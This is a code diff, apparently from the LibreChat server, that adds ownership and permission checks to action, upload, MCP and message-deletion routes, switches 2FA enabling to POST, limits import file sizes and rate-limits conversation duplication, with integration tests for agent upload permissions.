+201,7 @@ router.post( } /** @type {[Action]} */ - const updatedAction = await updateAction({ action_id }, actionUpdateData); + const updatedAction = await updateAction({ action_id, agent_id }, actionUpdateData); const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret']; for (let field of sensitiveFields) { @@ -228,22 +245,22 @@ router.delete( const { tools = [], actions = [] } = agent; - let domain = ''; + let storedDomain = ''; const updatedActions = actions.filter((action) => { if (action.includes(action_id)) { - [domain] = action.split(actionDelimiter); + [storedDomain] = action.split(actionDelimiter); return false; } return true; }); - domain = await domainParser(domain, true); - - if (!domain) { + if (!storedDomain) { return res.status(400).json({ message: 'No domain provided' }); } - const updatedTools = tools.filter((tool) => !(tool && tool.includes(domain))); + const updatedTools = tools.filter( + (tool) => !(tool && (tool.includes(storedDomain) || tool.includes(action_id))), + ); // Force version update since actions are being removed await updateAgent( @@ -251,7 +268,13 @@ router.delete( { tools: updatedTools, actions: updatedActions }, { updatingUserId: req.user.id, forceVersion: true }, ); - await deleteAction({ action_id }); + const deleted = await deleteAction({ action_id, agent_id }); + if (!deleted) { + logger.warn('[Agent Action Delete] No matching action document found', { + action_id, + agent_id, + }); + } res.status(200).json({ message: 'Action deleted successfully' }); } catch (error) { const message = 'Trouble deleting the Agent Action'; diff --git a/api/server/routes/agents/index.js b/api/server/routes/agents/index.js index f8d39cb4d8..a99fdca592 100644 --- a/api/server/routes/agents/index.js +++ b/api/server/routes/agents/index.js @@ -76,52 +76,62 @@ router.get('/chat/stream/:streamId', async (req, res) => { logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`); - // Send sync event with 
resume state for ALL reconnecting clients - // This supports multi-tab scenarios where each tab needs run step data - if (isResume) { - const resumeState = await GenerationJobManager.getResumeState(streamId); - if (resumeState && !res.writableEnded) { - // Send sync event with run steps AND aggregatedContent - // Client will use aggregatedContent to initialize message state - res.write(`event: message\ndata: ${JSON.stringify({ sync: true, resumeState })}\n\n`); + const writeEvent = (event) => { + if (!res.writableEnded) { + res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); if (typeof res.flush === 'function') { res.flush(); } - logger.debug( - `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps`, - ); } - } + }; - const result = await GenerationJobManager.subscribe( - streamId, - (event) => { - if (!res.writableEnded) { - res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); + const onDone = (event) => { + writeEvent(event); + res.end(); + }; + + const onError = (error) => { + if (!res.writableEnded) { + res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`); + if (typeof res.flush === 'function') { + res.flush(); + } + res.end(); + } + }; + + let result; + + if (isResume) { + const { subscription, resumeState, pendingEvents } = + await GenerationJobManager.subscribeWithResume(streamId, writeEvent, onDone, onError); + + if (!res.writableEnded) { + if (resumeState) { + res.write( + `event: message\ndata: ${JSON.stringify({ sync: true, resumeState, pendingEvents })}\n\n`, + ); if (typeof res.flush === 'function') { res.flush(); } - } - }, - (event) => { - if (!res.writableEnded) { - res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); - if (typeof res.flush === 'function') { - res.flush(); + GenerationJobManager.markSyncSent(streamId); + logger.debug( + `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps, ${pendingEvents.length} pending 
events`, + ); + } else if (pendingEvents.length > 0) { + for (const event of pendingEvents) { + writeEvent(event); } - res.end(); + logger.warn( + `[AgentStream] Resume state null for ${streamId}, replayed ${pendingEvents.length} gap events directly`, + ); } - }, - (error) => { - if (!res.writableEnded) { - res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`); - if (typeof res.flush === 'function') { - res.flush(); - } - res.end(); - } - }, - ); + } + + result = subscription; + } else { + result = await GenerationJobManager.subscribe(streamId, writeEvent, onDone, onError); + } if (!result) { return res.status(404).json({ error: 'Failed to subscribe to stream' }); diff --git a/api/server/routes/assistants/actions.js b/api/server/routes/assistants/actions.js index 57975d32a7..75ab879e2b 100644 --- a/api/server/routes/assistants/actions.js +++ b/api/server/routes/assistants/actions.js @@ -3,7 +3,11 @@ const { nanoid } = require('nanoid'); const { logger } = require('@librechat/data-schemas'); const { isActionDomainAllowed } = require('@librechat/api'); const { actionDelimiter, EModelEndpoint, removeNullishValues } = require('librechat-data-provider'); -const { encryptMetadata, domainParser } = require('~/server/services/ActionService'); +const { + legacyDomainEncode, + encryptMetadata, + domainParser, +} = require('~/server/services/ActionService'); const { getOpenAIClient } = require('~/server/controllers/assistants/helpers'); const { updateAction, getActions, deleteAction } = require('~/models/Action'); const { updateAssistantDoc, getAssistant } = require('~/models/Assistant'); @@ -39,13 +43,14 @@ router.post('/:assistant_id', async (req, res) => { return res.status(400).json({ message: 'Domain not allowed' }); } - let { domain } = metadata; - domain = await domainParser(domain, true); + const encodedDomain = await domainParser(metadata.domain, true); - if (!domain) { + if (!encodedDomain) { return res.status(400).json({ message: 'No domain provided' 
}); } + const legacyDomain = legacyDomainEncode(metadata.domain); + const action_id = _action_id ?? nanoid(); const initialPromises = []; @@ -60,6 +65,9 @@ router.post('/:assistant_id', async (req, res) => { if (actions_result && actions_result.length) { const action = actions_result[0]; + if (action.assistant_id !== assistant_id) { + return res.status(403).json({ message: 'Action does not belong to this assistant' }); + } metadata = { ...action.metadata, ...metadata }; } @@ -78,25 +86,29 @@ router.post('/:assistant_id', async (req, res) => { actions.push(action); } - actions.push(`${domain}${actionDelimiter}${action_id}`); + actions.push(`${encodedDomain}${actionDelimiter}${action_id}`); /** @type {{ tools: FunctionTool[] | { type: 'code_interpreter'|'retrieval'}[]}} */ const { tools: _tools = [] } = assistant; + const shouldRemoveAssistantTool = (tool) => { + if (!tool.function) { + return false; + } + const name = tool.function.name; + return ( + name.includes(encodedDomain) || name.includes(legacyDomain) || name.includes(action_id) + ); + }; + const tools = _tools - .filter( - (tool) => - !( - tool.function && - (tool.function.name.includes(domain) || tool.function.name.includes(action_id)) - ), - ) + .filter((tool) => !shouldRemoveAssistantTool(tool)) .concat( functions.map((tool) => ({ ...tool, function: { ...tool.function, - name: `${tool.function.name}${actionDelimiter}${domain}`, + name: `${tool.function.name}${actionDelimiter}${encodedDomain}`, }, })), ); @@ -117,7 +129,7 @@ router.post('/:assistant_id', async (req, res) => { // For new actions, use the assistant owner's user ID actionUpdateData.user = assistant_user || req.user.id; } - promises.push(updateAction({ action_id }, actionUpdateData)); + promises.push(updateAction({ action_id, assistant_id }, actionUpdateData)); /** @type {[AssistantDocument, Action]} */ let [assistantDocument, updatedAction] = await Promise.all(promises); @@ -168,23 +180,25 @@ router.delete('/:assistant_id/:action_id/:model', 
async (req, res) => { const { actions = [] } = assistant_data ?? {}; const { tools = [] } = assistant ?? {}; - let domain = ''; + let storedDomain = ''; const updatedActions = actions.filter((action) => { if (action.includes(action_id)) { - [domain] = action.split(actionDelimiter); + [storedDomain] = action.split(actionDelimiter); return false; } return true; }); - domain = await domainParser(domain, true); - - if (!domain) { + if (!storedDomain) { return res.status(400).json({ message: 'No domain provided' }); } const updatedTools = tools.filter( - (tool) => !(tool.function && tool.function.name.includes(domain)), + (tool) => + !( + tool.function && + (tool.function.name.includes(storedDomain) || tool.function.name.includes(action_id)) + ), ); await openai.beta.assistants.update(assistant_id, { tools: updatedTools }); @@ -196,9 +210,15 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => { assistantUpdateData.user = req.user.id; } promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData)); - promises.push(deleteAction({ action_id })); + promises.push(deleteAction({ action_id, assistant_id })); - await Promise.all(promises); + const [, deletedAction] = await Promise.all(promises); + if (!deletedAction) { + logger.warn('[Assistant Action Delete] No matching action document found', { + action_id, + assistant_id, + }); + } res.status(200).json({ message: 'Action deleted successfully' }); } catch (error) { const message = 'Trouble deleting the Assistant Action'; diff --git a/api/server/routes/auth.js b/api/server/routes/auth.js index e84442f65f..d55684f3de 100644 --- a/api/server/routes/auth.js +++ b/api/server/routes/auth.js @@ -63,7 +63,7 @@ router.post( resetPasswordController, ); -router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA); +router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA); router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA); router.post('/2fa/verify-temp', middleware.checkBan, 
verify2FAWithTempToken); router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA); diff --git a/api/server/routes/convos.js b/api/server/routes/convos.js index bb9c4ebea9..578796170a 100644 --- a/api/server/routes/convos.js +++ b/api/server/routes/convos.js @@ -1,7 +1,7 @@ const multer = require('multer'); const express = require('express'); const { sleep } = require('@librechat/agents'); -const { isEnabled } = require('@librechat/api'); +const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api'); const { logger } = require('@librechat/data-schemas'); const { CacheKeys, EModelEndpoint } = require('librechat-data-provider'); const { @@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => { }); const { importIpLimiter, importUserLimiter } = createImportLimiters(); +/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */ const { forkIpLimiter, forkUserLimiter } = createForkLimiters(); -const upload = multer({ storage: storage, fileFilter: importFileFilter }); +const importMaxFileSize = resolveImportMaxFileSize(); +const upload = multer({ + storage, + fileFilter: importFileFilter, + limits: { fileSize: importMaxFileSize }, +}); +const uploadSingle = upload.single('file'); + +function handleUpload(req, res, next) { + uploadSingle(req, res, (err) => { + if (err && err.code === 'LIMIT_FILE_SIZE') { + return res.status(413).json({ message: 'File exceeds the maximum allowed size' }); + } + if (err) { + return next(err); + } + next(); + }); +} /** * Imports a conversation from a JSON file and saves it to the database. 
@@ -238,7 +257,7 @@ router.post( importIpLimiter, importUserLimiter, configMiddleware, - upload.single('file'), + handleUpload, async (req, res) => { try { /* TODO: optimize to return imported conversations and add manually */ @@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => { } }); -router.post('/duplicate', async (req, res) => { +router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => { const { conversationId, title } = req.body; try { diff --git a/api/server/routes/files/files.js b/api/server/routes/files/files.js index 5de2ddb379..9290d1a7ed 100644 --- a/api/server/routes/files/files.js +++ b/api/server/routes/files/files.js @@ -2,12 +2,12 @@ const fs = require('fs').promises; const express = require('express'); const { EnvVar } = require('@librechat/agents'); const { logger } = require('@librechat/data-schemas'); +const { verifyAgentUploadPermission } = require('@librechat/api'); const { Time, isUUID, CacheKeys, FileSources, - SystemRoles, ResourceType, EModelEndpoint, PermissionBits, @@ -381,48 +381,15 @@ router.post('/', async (req, res) => { return await processFileUpload({ req, res, metadata }); } - /** - * Check agent permissions for permanent agent file uploads (not message attachments). - * Message attachments (message_file=true) are temporary files for a single conversation - * and should be allowed for users who can chat with the agent. - * Permanent file uploads to tool_resources require EDIT permission. 
- */ - const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true'; - if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) { - const userId = req.user.id; - - /** Admin users bypass permission checks */ - if (req.user.role !== SystemRoles.ADMIN) { - const agent = await getAgent({ id: metadata.agent_id }); - - if (!agent) { - return res.status(404).json({ - error: 'Not Found', - message: 'Agent not found', - }); - } - - /** Check if user is the author or has edit permission */ - if (agent.author.toString() !== userId) { - const hasEditPermission = await checkPermission({ - userId, - role: req.user.role, - resourceType: ResourceType.AGENT, - resourceId: agent._id, - requiredPermission: PermissionBits.EDIT, - }); - - if (!hasEditPermission) { - logger.warn( - `[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`, - ); - return res.status(403).json({ - error: 'Forbidden', - message: 'Insufficient permissions to upload files to this agent', - }); - } - } - } + const denied = await verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, + }); + if (denied) { + return; } return await processAgentFileUpload({ req, res, metadata }); diff --git a/api/server/routes/files/images.agents.test.js b/api/server/routes/files/images.agents.test.js new file mode 100644 index 0000000000..862ab87d63 --- /dev/null +++ b/api/server/routes/files/images.agents.test.js @@ -0,0 +1,376 @@ +const express = require('express'); +const request = require('supertest'); +const mongoose = require('mongoose'); +const { v4: uuidv4 } = require('uuid'); +const { createMethods } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { + SystemRoles, + AccessRoleIds, + ResourceType, + PrincipalType, +} = require('librechat-data-provider'); +const { createAgent } = require('~/models/Agent'); + 
+jest.mock('~/server/services/Files/process', () => ({ + processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => { + return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' }); + }), + processImageFile: jest.fn().mockImplementation(async ({ res }) => { + return res.status(200).json({ message: 'Image processed' }); + }), + filterFile: jest.fn(), +})); + +jest.mock('fs', () => { + const actualFs = jest.requireActual('fs'); + return { + ...actualFs, + promises: { + ...actualFs.promises, + unlink: jest.fn().mockResolvedValue(undefined), + }, + }; +}); + +const fs = require('fs'); +const { processAgentFileUpload } = require('~/server/services/Files/process'); + +const router = require('~/server/routes/files/images'); + +describe('POST /images - Agent Upload Permission Check (Integration)', () => { + let mongoServer; + let authorId; + let otherUserId; + let agentCustomId; + let User; + let Agent; + let AclEntry; + let methods; + let modelsToCleanup = []; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + await mongoose.connect(mongoUri); + + const { createModels } = require('@librechat/data-schemas'); + const models = createModels(mongoose); + modelsToCleanup = Object.keys(models); + Object.assign(mongoose.models, models); + methods = createMethods(mongoose); + + User = models.User; + Agent = models.Agent; + AclEntry = models.AclEntry; + + await methods.seedDefaultRoles(); + }); + + afterAll(async () => { + const collections = mongoose.connection.collections; + for (const key in collections) { + await collections[key].deleteMany({}); + } + for (const modelName of modelsToCleanup) { + if (mongoose.models[modelName]) { + delete mongoose.models[modelName]; + } + } + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Agent.deleteMany({}); + await User.deleteMany({}); + await AclEntry.deleteMany({}); + + authorId 
= new mongoose.Types.ObjectId(); + otherUserId = new mongoose.Types.ObjectId(); + agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`; + + await User.create({ _id: authorId, username: 'author', email: 'author@test.com' }); + await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' }); + + jest.clearAllMocks(); + }); + + const createAppWithUser = (userId, userRole = SystemRoles.USER) => { + const app = express(); + app.use(express.json()); + app.use((req, _res, next) => { + if (req.method === 'POST') { + req.file = { + originalname: 'test.png', + mimetype: 'image/png', + size: 100, + path: '/tmp/t.png', + filename: 'test.png', + }; + req.file_id = uuidv4(); + } + next(); + }); + app.use((req, _res, next) => { + req.user = { id: userId.toString(), role: userRole }; + req.app = { locals: {} }; + req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } }; + next(); + }); + app.use('/images', router); + return app; + }; + + it('should return 403 when user has no permission on agent', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should allow upload for agent owner', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(authorId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 
'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow upload for admin regardless of ownership', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(otherUserId, SystemRoles.ADMIN); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow upload for user with EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_EDITOR, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should deny upload for user with only VIEW permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: 
AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => { + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + }); + + it('should return 404 for non-existent agent', async () => { + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: 'agent_nonexistent123456789', + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(404); + expect(response.body.error).toBe('Not Found'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should allow message_file attachment (boolean true) without EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: 
agentCustomId, + tool_resource: 'context', + message_file: true, + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow message_file attachment (string "true") without EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + message_file: 'true', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should deny upload when message_file is false (not a message attachment)', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + message_file: false, + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + 
expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); +}); diff --git a/api/server/routes/files/images.js b/api/server/routes/files/images.js index 8072612a69..185ec7a671 100644 --- a/api/server/routes/files/images.js +++ b/api/server/routes/files/images.js @@ -2,12 +2,15 @@ const path = require('path'); const fs = require('fs').promises; const express = require('express'); const { logger } = require('@librechat/data-schemas'); +const { verifyAgentUploadPermission } = require('@librechat/api'); const { isAssistantsEndpoint } = require('librechat-data-provider'); const { processAgentFileUpload, processImageFile, filterFile, } = require('~/server/services/Files/process'); +const { checkPermission } = require('~/server/services/PermissionService'); +const { getAgent } = require('~/models/Agent'); const router = express.Router(); @@ -22,6 +25,16 @@ router.post('/', async (req, res) => { metadata.file_id = req.file_id; if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) { + const denied = await verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, + }); + if (denied) { + return; + } return await processAgentFileUpload({ req, res, metadata }); } diff --git a/api/server/routes/mcp.js b/api/server/routes/mcp.js index 0afac81192..57a99d199a 100644 --- a/api/server/routes/mcp.js +++ b/api/server/routes/mcp.js @@ -50,6 +50,18 @@ const router = Router(); const OAUTH_CSRF_COOKIE_PATH = '/api/mcp'; +const checkMCPUsePermissions = generateCheckAccess({ + permissionType: PermissionTypes.MCP_SERVERS, + permissions: [Permissions.USE], + getRoleByName, +}); + +const checkMCPCreate = generateCheckAccess({ + permissionType: PermissionTypes.MCP_SERVERS, + permissions: [Permissions.USE, Permissions.CREATE], + getRoleByName, +}); + /** * Get all MCP tools available to the user * Returns only MCP tools, completely decoupled from regular LibreChat tools @@ 
-470,69 +482,75 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => { * Reinitialize MCP server * This endpoint allows reinitializing a specific MCP server */ -router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => { - try { - const { serverName } = req.params; - const user = createSafeUser(req.user); +router.post( + '/:serverName/reinitialize', + requireJwtAuth, + checkMCPUsePermissions, + setOAuthSession, + async (req, res) => { + try { + const { serverName } = req.params; + const user = createSafeUser(req.user); - if (!user.id) { - return res.status(401).json({ error: 'User not authenticated' }); - } + if (!user.id) { + return res.status(401).json({ error: 'User not authenticated' }); + } - logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`); + logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`); - const mcpManager = getMCPManager(); - const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id); - if (!serverConfig) { - return res.status(404).json({ - error: `MCP server '${serverName}' not found in configuration`, + const mcpManager = getMCPManager(); + const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id); + if (!serverConfig) { + return res.status(404).json({ + error: `MCP server '${serverName}' not found in configuration`, + }); + } + + await mcpManager.disconnectUserConnection(user.id, serverName); + logger.info( + `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`, + ); + + /** @type {Record<string, Record<string, string>> | undefined} */ + let userMCPAuthMap; + if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') { + userMCPAuthMap = await getUserMCPAuthMap({ + userId: user.id, + servers: [serverName], + findPluginAuthsByKeys, + }); + } + + const result = await reinitMCPServer({ + user, + serverName, + userMCPAuthMap, + }); - } - await 
mcpManager.disconnectUserConnection(user.id, serverName); - logger.info( - `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`, - ); + if (!result) { + return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' }); + } - /** @type {Record<string, Record<string, string>> | undefined} */ - let userMCPAuthMap; - if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') { - userMCPAuthMap = await getUserMCPAuthMap({ - userId: user.id, - servers: [serverName], - findPluginAuthsByKeys, + const { success, message, oauthRequired, oauthUrl } = result; + + if (oauthRequired) { + const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName); + setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH); + } + + res.json({ + success, + message, + oauthUrl, + serverName, + oauthRequired, }); + } catch (error) { + logger.error('[MCP Reinitialize] Unexpected error', error); + res.status(500).json({ error: 'Internal server error' }); } - - const result = await reinitMCPServer({ - user, - serverName, - userMCPAuthMap, - }); - - if (!result) { - return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' }); - } - - const { success, message, oauthRequired, oauthUrl } = result; - - if (oauthRequired) { - const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName); - setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH); - } - - res.json({ - success, - message, - oauthUrl, - serverName, - oauthRequired, - }); - } catch (error) { - logger.error('[MCP Reinitialize] Unexpected error', error); - res.status(500).json({ error: 'Internal server error' }); - } -}); + }, +); /** * Get connection status for all MCP servers @@ -639,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) => * Check which authentication values exist for a specific MCP server * This endpoint returns only boolean flags indicating if values are set, not the actual values */ 
-router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => { +router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => { try { const { serverName } = req.params; const user = req.user; @@ -696,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) { MCP Server CRUD Routes (User-Managed MCP Servers) */ -// Permission checkers for MCP server management -const checkMCPUsePermissions = generateCheckAccess({ - permissionType: PermissionTypes.MCP_SERVERS, - permissions: [Permissions.USE], - getRoleByName, -}); - -const checkMCPCreate = generateCheckAccess({ - permissionType: PermissionTypes.MCP_SERVERS, - permissions: [Permissions.USE, Permissions.CREATE], - getRoleByName, -}); - /** * Get list of accessible MCP servers * @route GET /api/mcp/servers diff --git a/api/server/routes/messages.js b/api/server/routes/messages.js index c208e9c406..03286bc7f1 100644 --- a/api/server/routes/messages.js +++ b/api/server/routes/messages.js @@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => { try { - const { messageId } = req.params; - await deleteMessages({ messageId }); + const { conversationId, messageId } = req.params; + await deleteMessages({ messageId, conversationId, user: req.user.id }); res.status(204).send(); } catch (error) { logger.error('Error deleting message:', error); diff --git a/api/server/services/ActionService.js b/api/server/services/ActionService.js index 5e96726a46..bde052bba4 100644 --- a/api/server/services/ActionService.js +++ b/api/server/services/ActionService.js @@ -28,6 +28,7 @@ const { getLogStores } = require('~/cache'); const JWT_SECRET = process.env.JWT_SECRET; const toolNameRegex = /^[a-zA-Z0-9_-]+$/; +const protocolRegex = /^https?:\/\//; const replaceSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); /** @@ -48,7 +49,11 @@ const 
validateAndUpdateTool = async ({ req, tool, assistant_id }) => { actions = await getActions({ assistant_id, user: req.user.id }, true); const matchingActions = actions.filter((action) => { const metadata = action.metadata; - return metadata && metadata.domain === domain; + if (!metadata) { + return false; + } + const strippedMetaDomain = stripProtocol(metadata.domain); + return strippedMetaDomain === domain || metadata.domain === domain; }); const action = matchingActions[0]; if (!action) { @@ -66,10 +71,36 @@ const validateAndUpdateTool = async ({ req, tool, assistant_id }) => { return tool; }; +/** @param {string} domain */ +function stripProtocol(domain) { + const stripped = domain.replace(protocolRegex, ''); + const pathIdx = stripped.indexOf('/'); + return pathIdx === -1 ? stripped : stripped.substring(0, pathIdx); +} + +/** + * Encodes a domain using the legacy scheme (full URL including protocol). + * Used for backward-compatible matching against agents saved before the collision fix. + * @param {string} domain + * @returns {string} + */ +function legacyDomainEncode(domain) { + if (!domain) { + return ''; + } + if (domain.length <= Constants.ENCODED_DOMAIN_LENGTH) { + return domain.replace(/\./g, actionDomainSeparator); + } + const modifiedDomain = Buffer.from(domain).toString('base64'); + return modifiedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH); +} + /** * Encodes or decodes a domain name to/from base64, or replacing periods with a custom separator. * * Necessary due to `[a-zA-Z0-9_-]*` Regex Validation, limited to a 64-character maximum. + * Strips protocol prefix before encoding to prevent base64 collisions + * (all `https://` URLs share the same 10-char base64 prefix). * * @param {string} domain - The domain name to encode/decode. * @param {boolean} inverse - False to decode from base64, true to encode to base64. 
